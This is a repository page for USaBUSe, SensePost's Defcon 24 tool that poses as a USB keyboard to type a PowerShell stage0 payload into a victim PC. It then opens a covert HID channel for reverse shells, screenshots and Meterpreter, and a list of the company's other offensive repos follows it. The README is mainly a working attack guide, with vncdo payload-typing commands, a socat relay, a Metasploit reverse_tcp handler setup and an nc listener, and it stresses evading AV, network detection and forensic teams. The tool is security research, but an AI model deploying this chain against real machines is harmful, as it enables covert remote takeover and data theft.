• Stars
    star
    493
  • Rank 89,306 (Top 2 %)
  • Language
    C
  • License
    Other
  • Created over 8 years ago
  • Updated over 7 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Universal Serial aBUSe is a project to demonstrate the risks of hardware bypasses of software security by Rogan Dawes at SensePost.

Introduction

(There's a full write up at https://www.sensepost.com/blog/2016/universal-serial-abuse/)

Universal Serial aBUSe is a project released at Defcon 24 by Rogan Dawes. We took some fairly common attacks (fake keyboards in small USB devices that type nasty things) and extended them to provide us with a bi-directional binary channel over our own wifi network to give us remote access independent of the host's network. This gives us several improvements over traditional "Rubber Ducky" style attacks:

  • We can trigger the attack when we want. No missed executions.
  • We don't use the host's network. No hassle on exfil, or potential for NIDS catching us.
  • We can shrink our initial typed payload to just open the binary pipe. Much less fragile typing required.
  • Lots of heavy lifting can be moved to the hardware, which gives less for stuff like AV to trigger on or DFIR teams to find.
  • We don't show up as a network adapter, our binary pipe is an innocuous device, making it harder to spot.

Lastly, we wanted this to be a working, end-to-end, attack. This means we also spent time adding some nifty features like:

  • A mouse jiggler to prevent the screen saver from activating (but with no visible movement of the mouse)
  • Optimised payloads that are hidden from a user within 4s of their activation
  • An ability to integrate your favourite payload

Linux Update

Software for using low-cost Linux hardware, such as the BeagleBone Black, Raspberry Pi Zero (and now W, too!), Orange Pi Zero, etc was released recently. This enhances the protocol used over the "pipe" to support multiple concurrent connections, allowing things like meterpreter upgrades, beaconing C&C, etc, to work over USaBUSe. The new software includes the following:

  1. Linux shell script to configure the USB gadget (and remove it again)
  2. a VNC server implementation that emits keystrokes and mouse movements via a composite HID device.
  3. Updated Powershell code implementing the new multiplexing protocol, both for the initial bootstrap, as well as a more fully featured implementation.
  4. a HIDProxy implementation that reads and writes the raw HID device, and converts it back into multiple socket connections as necessary. It also delivers the second stage Powershell code.

Getting started with the Linux implementation is a matter of running the shell script to configure the USB gadget (currently identical to the AVR implementation of USaBUSe), running the VNC server, and the HID proxy, and setting up your listener to catch the incoming shell!

Running on Linux

I’ll assume that you have the SBC installed with a version of Linux. Depending on the SBC, you may have to jump through other hoops to get the OTG interface working. For examples, on the Raspberry Pi Zero, follow Gbaman’s guide. On the BeagleBone Black, everything is configured already, as far as I recall.

To make sure it is ready, check that the following command returns a result:

ls -l /sys/class/udc/

You will likely need a few prerequisites before you continue, particularly:

sudo apt install git libvncserver-dev build-essentials

Then

git clone https://github.com/SensePost/USaBUSe

Run the script to configure the USB gadget:

cd USaBUSe/linux sudo ./configure_USB.sh

You should see the OS recognise the new device, and load the drivers.

Compiling the VNC server should be fairly simple, just run make in the appropriate directory.

cd ../vncserver make ./usabuse_vnc &

Or alternatively, do not background it, and continue in a new terminal window (e.g. using screen).

At this point, you need to make a decision about where you want to run the HID proxy server. As a Java application, it can be a little heavyweight to run on a small SBC. It can run OK on the Pi Zero, but there is not a huge amount of memory available. The alternative, which is the recommended approach, is to forward the HID device file over the network to a more capable computer, using socat:

while sleep 5; do socat TCP:192.168.2.1:65534 /dev/hidg1 done

Substitute the 192.168.2.1 IP address for that of your own workstation. This will continuously attempt to connect to the HID Proxy server, and only then start reading and writing from the HID device.

Install Java on the computer you plan to run the HIDProxy on:

sudo apt install oracle-java8-jdk maven2 mvn package java -jar target/hidproxy-1.0.0.one-jar.jar

By default, the application will listen on *:65534 for an incoming connection, assuming that the HIDProxy is being run on a different machine to the SBC. To run it on the SBC, run it as follows:

java -Dsource=/dev/hidg1 -jar target/hidproxy-1.0.0.one-jar.jar

By default, HIDProxy will forward connections on channel 1 to localhost:4444, and any higher connections to localhost:65535. This is because the first connection is always the cmd shell, and any other connections will be connections to localhost:65535 on the victim.

See https://sensepost.com/blog/2017/usabuse-linux-updates/ for an example of how to use the TCP forwarding with Meterpreter.

Getting the Code

This repository has instructions and code for building the Universal Serial aBuse firmwares and host software. Start off by performing a recursive clone of the repository:

$ git clone --recursive https://github.com/sensepost/USaBUSe

This can take some time, please be patient!

If you'd like to just run the attacks, then you don't need to clone all the submodules. The latest release (https://github.com/sensepost/USaBUSe/releases) will have precompiled firmware. After that you'll just need:

  • esptool to flash the firmware
  • vncdotool to run the automated interaction on the client
  • the scripts in this repository for the payloads and orchestration

Programming the firmwares

  $ esp-vnc/flash_esp esp-vnc/firmware/user1.bin avr/KeyboardMouseGeneric/KeyboardMouseGeneric.hex

Note: The flash_esp and flash_avr shell scripts contain a pattern which usually manages to identify the serial port that the AVR appears at. If you have other USB Serial interfaces connected, you may want to either unplug them, or update the pattern to exclude the incorrect ports.

Interacting with the device

To send keystrokes and mouse movements to the device, use a VNC client. The password is hard coded to "password".

To do this in an automated way, the vncdo tool is very useful. It is referenced as a submodule, to install it:

  $ cd vncdotool
  $ python setup.py install

Note, vncdotool is only compatible with Python2.7, not python 3+

  $ vncdo -s esp-link.lan -p password type "echo hello" key enter

A more comprehensive example might be:

  $ vncdo -s esp-link.lan -p password key meta-r pause 1 type powershell key enter pause 1 typefile powershell/read_exec.ps1

If esp-link.lan does not resolve, look for port 23 and 5900 on the local network, or check your DHCP server.

Interacting with the Generic HID interface requires the victim-side code found under the powershell/ directory, as well as the attacker-side code found in stage.sh.

A demonstration of a complete, end-to-end attack can be found in attack.sh

In summary, the way it works is for the attacker to use VNC to type out a stage0 payload (currently using powershell), which has just enough smarts to open the higher-bandwidth channel (currently only Generic HID is implemented), and load and execute a more complicated stage1 payload. There are a couple of stage1 payloads implemented currently:

  • spawn.ps1 - Run cmd.exe, and pipe stdout/stderr over the device, while reading from the device, and writing that to stdin of the process.
  • screenshot.ps1 - take a screenshot of the desktop, and send it over the device.
  • msf_proxy.ps1 - Open a TCP socket on localhost:65535, and relay data back and forth over the device. In a separate thread, invoke the metasploit stage loader, connecting to localhost:65535. This can be used to run a msfconsole windows/shell/reverse_tcp or even (with some patience!) a full windows/meterpreter/reverse_tcp.

Patience is required because the USB device does not have particularly high bandwidth. Generic HID is limited to 64KB/s, and the UART between the two microprocessors is limited to 250kbps (25KBps), but other limitations (many likely due to naive implementation!) limit us even further! Currently, we are achieving approximately 4KBps.

Patches to improve the speed (and any other aspect of the system) are welcome!

Once the basic stage0 payload has been typed out via VNC, the second stage is sent via the Generic HID interface (only implementation currently).

read_exec.ps1 expects to receive the next stage in the following format:

<stage length high byte><stage length low byte><powershell stage>

The included stage.sh shell script takes care of this process for you.

Note! There is an important sleep included between sending the second stage, and connecting the socket to the final endpoint (msf, etc). The reason for this is that the second stage may not finish on a 63-byte boundary, and if the final endpoint starts sending data prematurely, some of that data may end up "packed" into the empty space in the last packet of the stage2 payload. Currently, the stage0 loader has no mechanism to keep this data aside for later use by the second stage, and it gets discarded. Introducing a sleep ensures that any data from the final endpoint does not get packed in with the stage2 payload, and avoids data corruption.

Using Metasploit Framework

The current attack.sh script expects to connect to a listener running on port 4444 on localhost. Exactly what sort of listener that should be depends on the stage1 script that was sent. If you send spawn.ps1, the listener can be a simple "nc -l -p 4444". If you are sending msf_proxy.ps1, the listener should be an appropriately configured msfconsole. You can choose your payload as you like, from the group of payloads that make use of a staged/reverse_tcp connection.

For example:

./msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit

NB: Do NOT set LHOST to 127.0.0.1, this is an internal "magic number" used by metasploit for its own purposes. Things randomly break if you do!

Building the AVR firmware

OS X can also get the AVR compiler by installing the Arduino app, e.g. Caskroom/cask/arduino

Linux can install using apt-get:

  $ sudo apt-get install gcc-avr avr-libc avrdude

Once the avr tools are installed, and avr-gcc is in your PATH, compile the avr firmwares:

  $ cd avr
  $ make

This should build two firmwares, Program_ESP and KeyboardMouseGeneric. i.e you should have .hex files in each directory.

Building the ESP8266 firmware

Once the recursive clone has completed, build the esp-open-sdk (make sure to build the STANDALONE version!). OS X users PLEASE NOTE that this step MUST be done on a case-sensitive filesystem!

  $ cd esp-open-sdk
  $ make STANDALONE=n

Once the esp-open-sdk has compiled, in the top-level directory, do:

  $ wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046"
  $ unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip

If you are on OS X, you will probably need to install GNU sed, and make sure it is in your PATH. An easy way of doing this is to use HomeBrew:

  $ brew install gnu-sed
  $ export PATH="/usr/local/opt/gnu-sed/libexec/gnubin:$PATH"

Alternatively, to ensure that it remains accessible after you log out, and to avoid strange errors on future builds, add it to your bash profile.

If you run into this, be sure to run "make clean" to remove any broken artifacts, before trying to build again.

At this stage, you should be able to change to the esp-vnc directory, and run make to build the ESP8266 firmware.

  $ cd esp-vnc
  $ make

NOTE: It is expected to get errors regarding incorrect parameters passed to stat on OS X. This is part of the original esp-link makefile, and has not been corrected. It does not affect the final firmware build, it is just a check to make sure that the firmware is not too big.

This should result in a user1.bin file in the esp-vnc/firmware directory.

More Repositories

1

objection

πŸ“± objection - runtime mobile exploration
Python
7,492
star
2

gowitness

πŸ” gowitness - a golang, web screenshot utility using Chrome Headless
Go
3,159
star
3

reGeorg

The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Python
3,015
star
4

ruler

A tool to abuse Exchange services
Go
2,164
star
5

mana

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM
HTML
1,087
star
6

DET

(extensible) Data Exfiltration Toolkit (DET)
Python
819
star
7

godoh

πŸ•³ godoh - A DNS-over-HTTPS C2
Go
752
star
8

kwetza

Python script to inject existing Android applications with a Meterpreter payload.
Smali
638
star
9

Snoopy

Snoopy: A distributed tracking and data interception framework
Python
597
star
10

hostapd-mana

SensePost's modified hostapd for wifi attacks.
C
543
star
11

rattler

Automated DLL Enumerator
C++
522
star
12

DNS-Shell

DNS-Shell is an interactive Shell over DNS channel
Python
521
star
13

snoopy-ng

Snoopy v2.0 - modular digital terrestrial tracking framework
Python
430
star
14

reDuh

Create a TCP circuit through validly formed HTTP requests
Java
343
star
15

Frack

Frack - Keep and Maintain your breach data
Python
309
star
16

autoDANE

Auto Domain Admin and Network Exploitation.
Python
295
star
17

impersonate

A windows token impersonation tool
Python
279
star
18

SPartan

Frontpage and Sharepoint fingerprinting and attack tool.
Python
277
star
19

wiresocks

A sock, with a wire, so you can tunnel all you desire.
Shell
272
star
20

mallet

Mallet is an intercepting proxy for arbitrary protocols
Java
262
star
21

UserEnum

Domain user enumeration tool
Python
212
star
22

jack

Drag and Drop ClickJacking PoC development assistance tool.
CSS
190
star
23

wpa_sycophant

Evil client portion of EAP relay attack
C
189
star
24

wikto

Nikto for Windows with some extra features.
C#
175
star
25

routopsy

Routopsy - Hacking Routers with Routers
Python
167
star
26

heartbleed-poc

Test for SSL heartbeat vulnerability (CVE-2014-0160)
Ruby
159
star
27

dwn

d(ockerp)wn - a docker pwn tool manager
Python
156
star
28

gdi-palettes-exp

DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects
C++
143
star
29

assless-chaps

Crack MSCHAPv2 challenge/responses quickly using a database of NT hashes
Python
127
star
30

wadi

Wadi Fuzzing Harness
JavaScript
127
star
31

birp

Big Iron Recon & Pwnage
Python
123
star
32

go-out

β˜„οΈ go-out - A Golang egress buster.
Go
122
star
33

mail-in-the-middle

Python
100
star
34

mydumbedr

C
99
star
35

liniaal

Liniaal - A communication extension to Ruler
Go
96
star
36

frida-windows-playground

A collection of Frida hooks for experimentation on Windows platforms.
C
95
star
37

ms16-098

Windows 8.1 x64 Exploit for MS16-098 RNGOBJ_Integer_Overflow
C
92
star
38

notruler

The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
Go
91
star
39

offensive-rpc

Offensive RPC PoC
C++
83
star
40

anapickle

Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.
Python
79
star
41

autoresponder

Quick python script to automatically load NTLM hashes from Responder logs and fires up Hashcat to crack them
Python
78
star
42

xrdp

A rudimentary remote desktop tool for the X11 protocol exploiting unauthenticated x11 sessions
Python
76
star
43

apostille

Java
72
star
44

peanuts

Peanuts is a free and open source wifi tracking tool. Based on the SensePosts Snoopy-NG project that is now closed.
Python
69
star
45

WiFi-Rifle

Creating a wireless rifle de-authentication gun, which utilized a yagi antenna and a Raspberry Pi.
Python
68
star
46

punch-q

πŸ‘Š A small utility to play with IBM MQ
Python
61
star
47

hash-cracker

Script to perform some hashcracking logic automagically
C
61
star
48

common-substr

Simple tool to extract the most common substrings from an input text. Built for password cracking.
Go
61
star
49

shinai-fi

Docker images for learning wifi hacking
Shell
60
star
50

thumbscr-ews

Exchangelib wrapper for pentesting
Python
56
star
51

wsproxy

A websocket proxy
JavaScript
55
star
52

BiLE-suite

The Bi-directional Link Extractor.
Perl
53
star
53

go-derper

Memcache hacking tool.
Ruby
47
star
54

yeti

SensePost's network footprinting and enumeration tool. You can't pwn what you don't know about.
Java
43
star
55

understanding-eap

A repository with toy implementations of MSCHAPv2, MPEE and WPA/2 to understand EAP better
Python
37
star
56

sockstlsproxy

C#
37
star
57

ntcrack

Left To My Own Devices - NT hash tools
Rust
31
star
58

dual-pod-shock

C
27
star
59

policies

Collection of information security policies.
27
star
60

Suru

Suru is one of the original Man In The Middle (MITM) proxies that sits between the user's browser and the web application.
C#
26
star
61

steampipe-plugin-projectdiscovery

A steampipe plugin to query projectdiscovery.io tools.
Go
26
star
62

squeeza

SQL Injection without the pain of syringes.
Ruby
24
star
63

x11-active-displays

Checks X11 and outputs a screenshot to of the display if allowed and the display is active
Lua
22
star
64

wpa3-vuln

hostapd and wpa_supplicant 2.7 vulnerable to Mathy's WPA3 bugs
C
21
star
65

SapCap

SApCap is a SAP packet sniffer and decompression tool for analysing SAP GUI (DIAG) traffic
C++
16
star
66

6thSense

A while back antirez, in a post to Bugtraq, detailed a new Tcp portscan method.
Perl
16
star
67

maltego-mvs

Tools to combine MVS data with external sources and visualise the output in Maltego.
Python
16
star
68

password-tools

Service desk password tools.
JavaScript
15
star
69

cipherchecks

visually see issues with supported cipher suites
Python
15
star
70

ntp_monlist

Basic script to pull addresses from a NTP server using the monlist command.
Python
14
star
71

XAPSpy

Runtime analysis of windows phone 7 applications.
C#
13
star
72

esp-vnc

Our fork of the esp-link firmware with a built in VNC server for passing input events to an AVR. Part of our Universal Serial aBUSe project.
C
11
star
73

casper

Casper is a tiny system tray application that can be used to view the invisible windows on your desktop.
C#
11
star
74

SAPProx

SAPProx is a proof of concept tool for intercepting and modifying SAP GUI (DIAG protocol) traffic.
C++
11
star
75

JBaah

HTTP Brute Forcer (Java replacement for SP's CrowBar).
Java
11
star
76

SP-DNS-mine

Google DNS name / sub domain miner.
Perl
10
star
77

SpUD

SensePost Unified Data API (SPUD) is a wrapper for apps requiring use of the deprecated Google API.
C#
10
star
78

neverevercookie

GUI for cleaning out evercookie persistence locations.
Java
10
star
79

dresscode

Python
10
star
80

berate_radius

Alpine hostapd-mana based RADIUS server
Shell
9
star
81

Manifestor

Android Manifest.xml tool
Python
9
star
82

ClashofSpamTitan

Python
9
star
83

BilePublic

BiLE stands for Bi-directional Link Extraction. It is used in the footprinting process to find non-obvious relationships between different web sites.
Perl
9
star
84

glypeahead

Port scan through Glype proxies.
PHP
8
star
85

finder

Finder.pl remotely checks IIS Servers for most of the methods used by WebDAV.
Perl
8
star
86

jcertchecker

JCertChecker is used to check HTTPS certificates.
Java
7
star
87

desperate

Perl
7
star
88

MonSoen

Proxy Server network scanner and tunnelling tool.
Python
7
star
89

Scully

Scully is a client interface to MSSQL and MySQL database servers.
C#
7
star
90

hash-cracker-apple-silicon

Script to perform some hashcracking logic automagically
Python
6
star
91

sconwar

a bring your own client programming game
Go
6
star
92

CarbanakCheck

Check squid logs for possible Carbanak malware.
Python
6
star
93

go

Seriously primitive portscanner using Squid proxy.
Perl
6
star
94

pudding

IDS evasion for web-based exploits via encoding built into a "proxy"
5
star
95

gr-protocoldecoder

A simple way to decode a known protocol in GRC in real time.
CMake
4
star
96

mpdchecker

Confirm the presence of HTTP methods per directory.
Python
4
star
97

unitools

For working with IIS servers with the Unicode bug
Perl
4
star
98

file-read-experiments

A few short scripts to look at the performance of various file read strategies.
Rust
4
star
99

ctf-challenges

A collection of CTF challenges
CSS
3
star
100

sensedecode

Sensedecode includes 2 perl scripts which exploit the IIS url decoding bug.
Perl
3
star